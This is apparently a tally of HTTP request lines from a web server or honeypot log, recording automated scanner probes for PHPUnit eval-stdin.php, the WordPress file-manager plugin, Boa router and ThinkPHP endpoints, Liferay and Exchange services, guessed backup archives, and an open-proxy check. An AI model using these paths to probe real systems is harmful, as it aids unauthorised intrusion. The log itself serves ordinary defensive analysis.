1	GET	/v.tar.bz2	HTTP/1.1
1	GET	/v.txt	HTTP/1.1
1	GET	/v.zip	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/w.gz	HTTP/1.1
1	GET	/w.tar	HTTP/1.1
1	GET	/w.tar.bz2	HTTP/1.1
1	GET	/w.txt	HTTP/1.1
1	GET	/w.zip	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/x.gz	HTTP/1.1
1	GET	/x.tar	HTTP/1.1
1	GET	/x.tar.bz2	HTTP/1.1
1	GET	/x.txt	HTTP/1.1
1	GET	/x.zip	HTTP/1.1
1	GET	/xaa	HTTP/1.1
1	GET	/y.gz	HTTP/1.1
1	GET	/y.tar	HTTP/1.1
1	GET	/y.tar.bz2	HTTP/1.1
1	GET	/y.txt	HTTP/1.1
1	GET	/y.zip	HTTP/1.1
1	GET	/z.gz	HTTP/1.1
1	GET	/z.tar	HTTP/1.1
1	GET	/z.tar.bz2	HTTP/1.1
1	GET	/z.txt	HTTP/1.1
1	GET	/z.zip	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1